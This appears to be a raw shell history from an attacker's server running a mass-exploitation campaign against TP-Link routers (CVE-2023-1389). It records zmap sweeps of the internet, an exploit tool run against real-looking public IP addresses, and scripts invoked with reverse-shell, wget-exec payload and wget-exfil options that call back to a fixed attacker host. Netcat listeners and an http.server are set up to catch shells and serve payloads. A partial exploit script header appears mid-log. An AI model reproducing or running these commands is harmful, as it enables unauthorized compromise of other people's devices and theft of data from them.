go get github.com/zenthangplus/goccm çs ls nano main.go go build -o cve-exploiter main.go ls ./cve-exploiter wget https://raw.githubusercontent.com/werwolfz/CVE-2023-1389/refs/heads/main/list.txt s ./cve-exploiter ./cve-exploiter -h 174.138.89.122 -p 5555 -d 8085 -l list.txt -t 100 zmap nano tuddo.txt history | grep zmap zmap -p 8085 --output-module=csv --output-fields=saddr,sport --output-filter='success=1 && repeat=0' --no-header-row -w tuddo.txt -o lista_8085.txt wc -l list wc -l lista_8085.txt cat lista_8085.txt ./cve-exploiter -h 174.138.89.122 -p 5555 -d 8085 -l lista_8085.txt -t 100 nano lista_8085.txt zmap -p 8085 --output-module=csv --output-fields=saddr --output-filter='success=1 && repeat=0' --no-header-row -w tuddo.txt -o lista_8085.txt zmap -p 8085 --output-module=csv --output-fields=saddr --output-filter='success=1 && repeat=0' --no-header-row -w tuddo.txt -o lista_8085.txt -B 1G ./cve-exploiter -h 174.138.89.122 -p 5555 -d 8085 -l lista_8085.txt -t 100 ./cve-exploiter -h 174.138.89.122 -p 5555 -d 8086 -l lista_8085.txt -t 100 ./cve-exploiter -h 174.138.89.122 -p 5555 -d 80 -l lista_8085.txt -t 100 ls cat lista_8085.txt ls nano teste.py python3 teste.py python3 teste.py --target-file lista_8085.txt python3 teste.py --target-file lista_8085.txt --lhost #!/usr/bin/python3 # -*- coding: utf-8 -*- # Exploit Title: Mass Exploiter for TP-Link RCE Vulnerabilities # Date: 2025-09-26 # Exploit Author: Your Name # Vendor Homepage: https://www.tp-link.com/ # CVEs: CVE-2025-9961 (Hypothetical), CVE-2023-1389 import requests import base64 import urllib.parse import argparse import sys import threading from concurrent.futures import ThreadPoolExecutor from requests.packages.urllib3.exceptions import InsecureRequestWarning # Suppress SSL warnings requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # Use a session for potential connection pooling session = requests.Session() session.headers.update({ }) def exploit_cve_2025_9961(target_ip, port, payload, use_ssl, no_base64): def exploit_cve_2023_1389(target_ip, payload): def worker(target_ip, args, reverse_shell_payload): if __name__ == "__main__":; parser = argparse.ArgumentParser( python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 nano teste.py python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 --help nano teste.py python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 --help python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 nano lista_8085.txt nano teste.py python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 python3 teste.py - python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 --lport 53 python3 teste.py --target-file lista_8085.txt --lhost 174.138.89.122 --lport 443 python3 teste.py nano teste.py python3 teste.py python3 teste.py --target-url https://177.93.202.115:8443 --lhost 174.138.89.122 --port 443 python3 teste.py --target-url https://177.93.202.115:8443 --lhost 174.138.89.122 --lport 443 ls ./cve-exploiter ls nano list.txt nano main.go nano list nano list.txt rm -rf list nano list.txt rm -rf list.txt nano list.txt ./cve-exploiter ./cve-exploiter -h 174.138.89.122 -p 5555 -l list.txt nano main.go ./cve-exploiter -h 174.138.89.122 -p 5555 -l list.txt -d 8443 ./cve-exploiter -h 174.138.89.122 -p 4443 -l list.txt -d 8443 ls rm -rf * cd .. ls cd /home/ ls nano teste. nano teste.py python3 teste.py python3 teste.py --help python3 teste.py --attacker-ip 174.138.89.122 --nc-port 4443 python3 teste.py --attacker-ip 174.138.89.122 --nc-port 4443 --target 177.93.202.115 python3 teste.py --attacker-ip 174.138.89.122 --nc-port 4443 --target 177.93.202.115 --ports 8443 python3 teste.py --attacker-ip 174.138.89.122 --nc-port 4443 --target 177.93.202.115 --ports 8443 -v nano teste.py python3 teste.py --attacker-ip 174.138.89.122 --nc-port 4443 --target 177.93.202.115 --ports 8443 -v ls cd cve-2023-1389/ ls python3 archer- python3 archer-rev-shell.py ls nano script.py python3 script.py python3 script.py --help python3 script.py -a 174.138.89.122 -p 4443 -r https://177.93.202.115:8443/ python3 script.py -a 174.138.89.122 -p 4443 -r 177.93.202.115:8443 iptables -vnL iptables-save ls nano teste1.py python3 teste1.py rm -rf teste1.py ls ls -la /home/ ls -la cv ls -la /root/cve-exploiter/ ls python3 archer-rev-shell.py python3 archer-rev-shell.py --help python3 archer-rev-shell.py -r 179.189.0.172 -a 174.138.89.122 -p 4443 nano archer-rev-shell.py python3 archer-rev-shell.py -r 45.7.166.227 -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r 179.189.0.172 -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r 45.166.149.129 -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r 45.7.166.227 -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r 103.153.86.223 -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r 179.189.0.172 -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r http://79.12.41.147/ -a 174.138.89.122 -p 4443 python3 archer-rev-shell.py -r 79.12.41.147 -a 174.138.89.122 -p 4443 nano archer-rev-shell.py python3 archer-rev-shell.py -r 79.12.41.147 -a 174.138.89.122 -p 4443 ls nano script.py python3 script.py nano lista.txt nano script.py python3 script.py python3 script.py --target-file lista.txt --lhost 174.138.89.122 --reverse-shell --lport 5555 python3 script.py --target-file lista.txt --lhost 174.138.89.122 --wget-exec payload.sh --web-port 80 python3 script.py --target-file lista.txt --lhost 174.138.89.122 --wget-exec payload.sh --web-port 80 -v nano script.py python3 script.py python3 script.py --target-file lista.txt --lhost 174.138.89.122 --wget-exec payload.sh --web-port 80 -v ls nano lista.txt history | grep zmap zmap -p 8085 --output-module=csv --output-fields="saddr:sport" --output-filter='success=1 && repeat=0' --no-header-row -w tuddo.txt -o vulns_holistica -B 1G zmap -p 443,8443,4443 --output-module=csv --output-fields="saddr,sport" --output-filter='success=1 && repeat=0' --no-header-row -w tuddo.txt -o vulns_holistica -B 1G zmap -p 443,8443,4443 --output-module=csv --output-fields="saddr,sport" --output-filter='success=1 && repeat=0' --no-header-row -w lista.txt -o vulns_holistica -B 1G wc -l vulns_holistica cat vulns_holistica | less cat vulns_holistica | tr ',' ':' cat vulns_holistica | tr ',' ':' > vulns_holistica cat vulns_holistica zmap -p 443,8443,4443 --output-module=csv --output-fields="saddr,sport" --output-filter='success=1 && repeat=0' --no-header-row -w lista.txt -o vulns_holistica -B 1G cat vulns_holistica | tr ',' ':' > vulns_holistica2 ; rm -rf vulns_holistica ; mv vulns_holistica2 vulns_holistica cat vulns_holistica cat vulns_holistica | less cat vulns_holistica | head -n 10 nano script.py python3 script.py python3 script.py --target-file vulns_holistica --lhost 174.138.89.122 --reverse-shell --threads 150 --verbose python3 script.py --target-file vulns_holistica --lhost 174.138.89.122 --wget-exfil "uname -a" --threads 200 screen -ls screen ifconfig screen -r pts-0.ubuntu-c-4-intel-nyc3-01 exit screen -r pts-0.ubuntu-c-4-intel-nyc3-01 cd /home/ ls cd cve-2023-1389/ ls nc 174.138.89.122 4444 nc -avp 174.138.89.122 4444 netstat -an | grep 444 netstat -an | grep 4444 nc 174.138.89.122 4444 nc 174.138.89.122:4444 nc 174.138.89.122 4444 nc -l -p 4444 nc -l -v -p 4444 nc -l -v -p 5555 nc -lnvp 5555 tcpdump -i any -vvnnnn src host 187.94.215.170 nc -lnvp 5555 nc -lnvp 53 nc -lnvp 80 nc -lnvp 443 ks ls ks nc -lnvp 443 nc -lnvp 4443 tcpdump -i any -vnnn port 4443 nc -lnvp 4443 > out python3 -m http.server 80 python3 -m http.server 443 service nginx stop python3 -m http.server 80 nc -lnvp 5555 python3 -m http.server 80 cat /var/log/nginx/access.log ls cat /var/log/nginx/ cat /var/log/nginx/* cat /var/log/nginx/* | grep luci python3 -m http.server 80 ifconfig python3 -m http.server 80 nc -lnvp 5555 python3 -m http.server 8000 ls cat vulns_holistica ssh 45.167.237.104 mtr 45.81.252.38 tcping nc 45.81.252.38 38241 mtr 45.81.252.38 pkill trafficgen mtr 45.81.252.38 dig c.loyaltyservices.lol dig hikylover.st mtr 196.251.72.82 mtr 45.81.252.38 mtr 196.251.72.82 mtr 45.81.252.38 mtr 196.251.72.82 mtr 89.32.41.64 telnet route-server.he.net